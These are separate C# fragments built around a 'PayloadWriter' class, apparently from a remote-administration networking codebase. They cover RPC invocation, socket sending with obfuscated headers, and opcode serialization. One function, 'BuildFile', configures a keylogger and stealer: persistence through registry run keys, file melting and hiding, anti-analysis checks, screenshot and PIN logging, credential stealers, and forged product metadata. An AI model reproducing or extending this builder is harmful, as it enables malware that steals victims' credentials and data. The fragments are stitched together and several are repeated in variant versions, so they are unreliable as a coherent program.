public override byte[] ToByteArray() { PayloadWriter writer = new PayloadWriter(); writer.WriteBytes(OtherOpcodes.MOV_VARIABLE_VALUE); writer.WriteInteger(ModifiyValue.Address); writer.WriteString(varName); //lets serialize the new value writer.WriteByte(isRegister ? (byte)1 : (byte)0); if (isRegister) { writer.WriteByte((byte)register); } else { MemoryStream mem = new MemoryStream(); new BinaryFormatter().Serialize(mem, newValue); writer.WriteInteger((int)mem.Length); writer.WriteBytes(mem.ToArray()); } return(writer.ToByteArray()); }
public override unsafe bool Cache(byte[] Input, int Offset, int Length, MemoryStream Output) { PayloadWriter pw = new PayloadWriter(Output); for (int i = Offset, j = 0; i < Length;) { int RamCacheIndex = j % base.CacheBuffer.Length; int length = MemCmp(Input, i, base.CacheBuffer, RamCacheIndex); if (length > 0) { CacheInfo inf = new CacheInfo(RamCacheIndex, i, length, true, Instruction.MEMCPY); pw.WriteByte((byte)CachingType.Equal); pw.WriteInteger(length); } else { //first byte in offset wasn't equal //lets scan to see how far it goes length = UnMemCmp(Input, i, base.CacheBuffer, RamCacheIndex); pw.WriteByte((byte)CachingType.NotEqual); pw.WriteInteger(length); pw.WriteBytes(Input, i, length); CacheInfo inf = new CacheInfo(-1, i, length, false, Instruction.NEWDATA); inf.instruction = Instruction.NEWDATA; } i += length; j += length; } return(true); }
public override byte[] ToByteArray() { PayloadWriter writer = new PayloadWriter(); switch (register) { case Register.EAX: writer.WriteBytes(OtherOpcodes.MOV_EAX_DWORD_PTR); break; case Register.ECX: writer.WriteBytes(OtherOpcodes.MOV_ECX_DWORD_PTR); break; case Register.EBP: writer.WriteBytes(OtherOpcodes.MOV_EBP_DWORD_PTR); break; case Register.EBX: writer.WriteBytes(OtherOpcodes.MOV_EBX_DWORD_PTR); break; case Register.EDI: writer.WriteBytes(OtherOpcodes.MOV_EDI_DWORD_PTR); break; case Register.EDX: writer.WriteBytes(OtherOpcodes.MOV_EDX_DWORD_PTR); break; case Register.ESI: writer.WriteBytes(OtherOpcodes.MOV_ESI_DWORD_PTR); break; case Register.ESP: writer.WriteBytes(OtherOpcodes.MOV_ESP_DWORD_PTR); break; } writer.WriteInteger(ModifiyValue.Address); return(writer.ToByteArray()); }
public override byte[] ToByteArray() { PayloadWriter writer = new PayloadWriter(); writer.WriteByte((byte)OpcodeList.MOV_EAX_DWORD_PTR); writer.WriteInteger(ModifiyValue.Address); writer.WriteByte(varName == null ? (byte)0 : (byte)1); writer.WriteInteger(Index); if (varName != null) { writer.WriteString(varName); } writer.WriteByte((byte)register); return(writer.ToByteArray()); }
private void _Invoke(ref object RetObject, params object[] args) { if (args.Length < ArgumentTypes.Length) //check if a argument is using "params x[] args" { throw new Exception("missing arguments"); } List <int> usedDelegates = new List <int>(); PayloadWriter pw = new PayloadWriter(); pw.WriteInteger(sharedClass.SharedId); pw.WriteInteger(MethodId); pw.WriteByte(isDelegate ? (byte)1 : (byte)0); if (isDelegate) { pw.WriteInteger(this.DelegateId); pw.WriteInteger(this.sharedClass.SharedId); } SmartSerializer serializer = new SmartSerializer(); for (int i = 0; i < args.Length; i++) { object obj = ArgumentTypes[i].IsByRef ? null : args[i]; if (DelegateIndex.ContainsKey(i)) { obj = null; } byte[] SerializedObj = serializer.Serialize(obj); pw.WriteInteger(SerializedObj.Length); pw.WriteBytes(SerializedObj); } for (int i = 0; i < DelegateIndex.Count; i++) { Delegate del = args[DelegateIndex.Keys[i]] as Delegate; if (del != null) { if (del.Method == null) { throw new Exception("Target delegate is NULL"); } int id = rnd.Next(); while (Delegates.ContainsKey(id)) { id = rnd.Next(); } pw.WriteByte(1); SharedDelegate sharedDel = new SharedDelegate(del.Method, sharedClass, del.GetType(), id, del, this.MethodId); sharedDel.sharedMethod.Unchecked = DelegateIndex.Values[i].isUnchecked; sharedDel.sharedMethod.usePacketQueue = DelegateIndex.Values[i].UsePacketQueue; sharedDel.sharedMethod.useUdp = DelegateIndex.Values[i].UseUDP; sharedDel.sharedMethod.NoWaitingTime = DelegateIndex.Values[i].NoWaitingTime; pw.WriteObject(sharedDel); if (!isDelegate) { Delegates.Add(id, sharedDel); } continue; } pw.WriteByte(0); } if (Unchecked || useUdp) { //just execute the method and don't wait for response sharedClass.connection.Connection.SendMessage(new MsgExecuteMethod(0, pw.ToByteArray(), false)); } else { SyncObject syncObject = null; Random rnd = new Random(); int RequestId = rnd.Next(); lock (sharedClass.connection.MethodRequests) { while (sharedClass.connection.MethodRequests.ContainsKey(RequestId)) { RequestId = rnd.Next(); } syncObject = new SyncObject(sharedClass.connection.Connection.Connection); sharedClass.connection.MethodRequests.Add(RequestId, syncObject); sharedClass.connection.Connection.SendMessage(new MsgExecuteMethod(RequestId, pw.ToByteArray(), true)); } RetObject = syncObject.Wait <ReturnResult>(null, 0); } /*if (callback != null) * { * sharedClass.connection.BeginSendRequest(pw, callback, true, this.usePacketQueue); * } * else * { * if (Unchecked || useUdp) * { * //just don't wait till we received something back since it's a VOID anyway * sharedClass.connection.BeginSendRequest(pw, (object obj) => { }, false, this.usePacketQueue); * } * else * { * RetObject = sharedClass.connection.SendRequest(pw, this.usePacketQueue); * } * }*/ serializer = null; }
private void BuildFile() { this.Enabled = false; string uploadKey = tbUploadKey.txtbox.Text; string time = nudInterval.Value.ToString(); string mutex = Random(); if (string.IsNullOrEmpty(uploadKey) || string.IsNullOrEmpty(time)) { this.Enabled = true; return; } tbBuildLog.Text += "> Upload Key: " + uploadKey + Environment.NewLine; tbBuildLog.Text += "> Log Interval: " + time + Environment.NewLine; tbBuildLog.Text += "> Mutex: " + mutex + Environment.NewLine; bool installFile = cbInstallFile.Checked; string processName = tbProcessName.txtbox.Text; string folder = tbFolder.txtbox.Text; string directory = cbDirectory.Text; bool hkcu = cbHKCU.Checked; bool hklm = cbHKLM.Checked; string hkcuKey = tbHKCU.txtbox.Text; string hklmKey = tbHKLM.txtbox.Text; bool meltFile = cbMeltFile.Checked; bool antis = cbAntis.Checked; bool sendScreenshots = cbSendScreenshots.Checked; bool hideFile = cbHideFile.Checked; bool pinlogger = cbPinlogger.Checked; bool stealers = cbStealers.Checked; string title = tbTitle.txtbox.Text; string description = tbDescription.txtbox.Text; string product = tbProduct.txtbox.Text; string copyright = tbCopyright.txtbox.Text; string version = tbVersion.txtbox.Text; string guid = tbGUID.txtbox.Text; string iconPath = tbIconPath.txtbox.Text; bool changeIcon = !string.IsNullOrEmpty(tbIconPath.txtbox.Text); byte[] iconFile = null; if (changeIcon) { iconFile = File.ReadAllBytes(iconPath); } using (PayloadWriter pw = new PayloadWriter()) { pw.WriteByte(0x03); pw.WriteString(uploadKey); pw.WriteString(time); pw.WriteString(mutex); pw.WriteBool(installFile); if (installFile) { pw.WriteString(processName); pw.WriteString(folder); pw.WriteString(directory); } pw.WriteBool(hkcu); if (hkcu) { pw.WriteString(hkcuKey); } pw.WriteBool(hklm); if (hklm) { pw.WriteString(hklmKey); } pw.WriteBool(meltFile); pw.WriteBool(antis); pw.WriteBool(sendScreenshots); pw.WriteBool(hideFile); pw.WriteBool(pinlogger); pw.WriteBool(stealers); pw.WriteString(title); pw.WriteString(description); pw.WriteString(product); pw.WriteString(copyright); pw.WriteString(version); pw.WriteString(guid); pw.WriteBool(changeIcon); if (changeIcon) { pw.WriteInteger(iconFile.Length); pw.WriteBytes(iconFile); } byte[] packet = pw.ToByteArray(); tbBuildLog.Text += "> Sending packet size: " + packet.Length + Environment.NewLine; GlobalVariables.SendData(packet); } }
private void _Invoke(ref object RetObject, params object[] args) { if (args.Length < ArgumentTypes.Length) //check if a argument is using "params x[] args" { throw new Exception("missing arguments"); } List <int> usedDelegates = new List <int>(); PayloadWriter pw = new PayloadWriter(); SmartSerializer serializer = new SmartSerializer(); for (int i = 0; i < args.Length; i++) { object obj = ArgumentTypes[i].IsByRef ? null : args[i]; if (DelegateIndex.ContainsKey(i)) { obj = null; } byte[] SerializedObj = serializer.Serialize(obj); pw.WriteInteger(SerializedObj.Length); pw.WriteBytes(SerializedObj); } for (int i = 0; i < DelegateIndex.Count; i++) { Delegate del = args[DelegateIndex.Keys[i]] as Delegate; if (del != null) { if (del.Method == null) { throw new Exception("Target delegate is NULL"); } int id = rnd.Next(); while (Delegates.ContainsKey(id)) { id = rnd.Next(); } pw.WriteBool(true); SharedDelegate sharedDel = new SharedDelegate(del.Method, sharedClass, del.GetType(), id, del, this.MethodId); sharedDel.sharedMethod.Unchecked = this.Unchecked; //DelegateIndex.Values[i].isUnchecked; sharedDel.sharedMethod.usePacketQueue = this.usePacketQueue; //DelegateIndex.Values[i].UsePacketQueue; sharedDel.sharedMethod.useUdp = this.useUdp; //DelegateIndex.Values[i].UseUDP; pw.WriteObject(sharedDel); if (!isDelegate) { Delegates.Add(id, sharedDel); } continue; } pw.WriteBool(false); } try { if (Unchecked || useUdp) { //just execute the method and don't wait for response sharedClass.Client.Send(new MsgExecuteMethod(0, pw.ToByteArray(), false, sharedClass.SharedId, MethodId, this.DelegateId, this.sharedClass.SharedId)); } else { SyncObject syncObject = null; Random rnd = new Random(); int RequestId = rnd.Next(); lock (sharedClass.Client.Requests) { while (sharedClass.Client.Requests.ContainsKey(RequestId)) { RequestId = rnd.Next(); } syncObject = new SyncObject(sharedClass.Client); sharedClass.Client.Requests.Add(RequestId, syncObject); sharedClass.Client.Send(new MsgExecuteMethod(RequestId, pw.ToByteArray(), true, sharedClass.SharedId, MethodId, this.DelegateId, this.sharedClass.SharedId)); } RetObject = syncObject.Wait <ReturnResult>(null, TimeOutLength); if (syncObject.TimedOut) { //copying the object in memory, maybe a strange way todo it but it works RetObject = new ReturnResult(serializer.Deserialize(serializer.Serialize(this.TimeOutValue)), false); } } } catch { //client most likely disconnected and was unable to send the message RetObject = null; } /*if (callback != null) * { * sharedClass.connection.BeginSendRequest(pw, callback, true, this.usePacketQueue); * } * else * { * if (Unchecked || useUdp) * { * //just don't wait till we received something back since it's a VOID anyway * sharedClass.connection.BeginSendRequest(pw, (object obj) => { }, false, this.usePacketQueue); * } * else * { * RetObject = sharedClass.connection.SendRequest(pw, this.usePacketQueue); * } * }*/ serializer = null; }
private void _Invoke(ref object RetObject, params object[] args) { if (args.Length < ArgumentTypes.Length) //check if a argument is using "params x[] args" throw new Exception("missing arguments"); List<int> usedDelegates = new List<int>(); PayloadWriter pw = new PayloadWriter(); pw.WriteInteger(sharedClass.SharedId); pw.WriteInteger(MethodId); pw.WriteByte(isDelegate ? (byte)1 : (byte)0); if (isDelegate) { pw.WriteInteger(this.DelegateId); pw.WriteInteger(this.sharedClass.SharedId); } SmartSerializer serializer = new SmartSerializer(); for (int i = 0; i < args.Length; i++) { object obj = ArgumentTypes[i].IsByRef ? null : args[i]; if (DelegateIndex.ContainsKey(i)) obj = null; byte[] SerializedObj = serializer.Serialize(obj); pw.WriteInteger(SerializedObj.Length); pw.WriteBytes(SerializedObj); } for (int i = 0; i < DelegateIndex.Count; i++) { Delegate del = args[DelegateIndex.Keys[i]] as Delegate; if (del != null) { if (del.Method == null) throw new Exception("Target delegate is NULL"); int id = rnd.Next(); while(Delegates.ContainsKey(id)) id = rnd.Next(); pw.WriteByte(1); SharedDelegate sharedDel = new SharedDelegate(del.Method, sharedClass, del.GetType(), id, del, this.MethodId); sharedDel.sharedMethod.Unchecked = DelegateIndex.Values[i].isUnchecked; sharedDel.sharedMethod.usePacketQueue = DelegateIndex.Values[i].UsePacketQueue; sharedDel.sharedMethod.useUdp = DelegateIndex.Values[i].UseUDP; sharedDel.sharedMethod.NoWaitingTime = DelegateIndex.Values[i].NoWaitingTime; pw.WriteObject(sharedDel); if (!isDelegate) { Delegates.Add(id, sharedDel); } continue; } pw.WriteByte(0); } if (Unchecked || useUdp) { //just execute the method and don't wait for response sharedClass.connection.Connection.SendMessage(new MsgExecuteMethod(0, pw.ToByteArray(), false)); } else { SyncObject syncObject = null; Random rnd = new Random(); int RequestId = rnd.Next(); lock (sharedClass.connection.MethodRequests) { while(sharedClass.connection.MethodRequests.ContainsKey(RequestId)) RequestId = rnd.Next(); syncObject = new SyncObject(sharedClass.connection.Connection.Connection); sharedClass.connection.MethodRequests.Add(RequestId, syncObject); sharedClass.connection.Connection.SendMessage(new MsgExecuteMethod(RequestId, pw.ToByteArray(), true)); } RetObject = syncObject.Wait<ReturnResult>(null, 0); } /*if (callback != null) { sharedClass.connection.BeginSendRequest(pw, callback, true, this.usePacketQueue); } else { if (Unchecked || useUdp) { //just don't wait till we received something back since it's a VOID anyway sharedClass.connection.BeginSendRequest(pw, (object obj) => { }, false, this.usePacketQueue); } else { RetObject = sharedClass.connection.SendRequest(pw, this.usePacketQueue); } }*/ serializer = null; }
/// <summary> /// Send data to the established connection /// </summary> /// <param name="Message">The data to send</param> /// <param name="Header">The Header to use for adding additional information</param> /// <param name="feature">The Feature that has been used for this Message</param> /// <param name="OpSocket">The OperationalSocket that has been used for this Message</param> internal int SendMessage(IMessage Message, Header Header, Feature feature = null, OperationalSocket OpSocket = null) { lock (SendLock) { if (!Connected) { return(-1); } if (Message == null) { throw new ArgumentException("Message cannot be null"); } if (Header == null) { throw new ArgumentException("Header cannot be null"); } ushort HeaderId = OpSocket != null?OpSocket.Headers.GetHeaderId(Header) : Headers.GetHeaderId(Header); byte[] SerializedHeader = Header.Serialize(Header); uint messageId = OpSocket != null?OpSocket.MessageHandler.GetMessageId(Message.GetType()) : messageHandler.GetMessageId(Message.GetType()); if (SerializedHeader.Length >= MAX_PACKET_SIZE) { throw new ArgumentException("Header length cannot be greater then " + MAX_PAYLOAD); } using (MemoryStream outStream = new MemoryStream()) using (PayloadWriter pw = new PayloadWriter(outStream)) { pw.WriteBytes(new byte[HEADER_SIZE], 0, HEADER_SIZE); //reserve space pw.WriteBytes(SerializedHeader); pw.WriteUInteger(messageId); int packetSize = messageHandler.EncryptMessage(this, Message, outStream); if (pw.Length > MAX_PACKET_SIZE) { throw new OverflowException("Message size cannot be greater then " + MAX_PACKET_SIZE); } int PayloadLength = pw.Length - Connection.HEADER_SIZE; byte CurPacketId = 0; int FeatureId = feature != null?feature.GetFeatureId() : -1; ushort ConnectionId = OpSocket != null ? OpSocket.ConnectionId : (ushort)0; byte checksum = 0; checksum += (byte)PayloadLength; checksum += CurPacketId; checksum += (byte)ConnectionId; checksum += (byte)HeaderId; checksum += (byte)FeatureId; pw.Position = 0; pw.WriteThreeByteInteger(PayloadLength); //length pw.WriteByte(CurPacketId); //cur packet id pw.WriteUShort(ConnectionId); //Connection Id pw.WriteUShort(HeaderId); //Header Id pw.WriteByte(checksum); pw.WriteInteger(FeatureId); //encrypt the header lock (HeaderEncryption) { HeaderEncryption.Encrypt(pw.GetBuffer(), 0, HEADER_SIZE); byte[] temp = pw.GetBuffer(); headerConfuser.Obfuscate(ref temp, 0); } int SendNum = 0; try { for (int i = 0; i < outStream.Length;) { int len = i + 65535 < outStream.Length ? 65535 : (int)outStream.Length - i; Handle.Send(outStream.GetBuffer(), i, len, SocketFlags.None); i += len; SendNum += len; } } catch (Exception ex) { Disconnect(); return(-1); } SysLogger.Log("Send " + outStream.Length, SysLogType.Network); PacketsOut++; DataOut += (ulong)outStream.Length; this.LastPacketSendSW = Stopwatch.StartNew(); return(SendNum); } /*using (OptimizedPayloadStream ms = new OptimizedPayloadStream(SerializedHeader, HeaderId, feature, OpSocket)) * { * ms.Write(BitConverter.GetBytes(messageId), 0, 4); * * MemoryStream stream = ms.PayloadFrames[ms.PayloadFrames.Count - 1]; * * int ReservedPos = (int)stream.Position; * ms.Write(new byte[3], 0, 3); //reserve space * * ms.WritingMessage = true; * Serializer.Serialize(ms, Message); * ms.WritingMessage = false; * * using (PayloadWriter pw = new PayloadWriter(new MemoryStream(stream.GetBuffer()))) * { * pw.Position = ReservedPos; //skip MessageId data * pw.WriteThreeByteInteger(ms.MessageLength);//Reserved Space + MessageId = 7 * } * ms.Commit(this); * * for (int i = 0; i < ms.PayloadFrames.Count; i++) * { * stream = ms.PayloadFrames[i]; * * lock (HeaderEncryption) * { * HeaderEncryption.Encrypt(stream.GetBuffer(), 0, HEADER_SIZE); * * byte[] temp = stream.GetBuffer(); * headerConfuser.Obfuscate(ref temp, 0); * } * //lock (PayloadEncryption) * //{ * // PayloadEncryption.Encrypt(stream.GetBuffer(), HEADER_SIZE, (int)stream.Length - HEADER_SIZE); * //} * * Handle.Send(stream.GetBuffer(), 0, (int)stream.Length, SocketFlags.None); * } * }*/ } }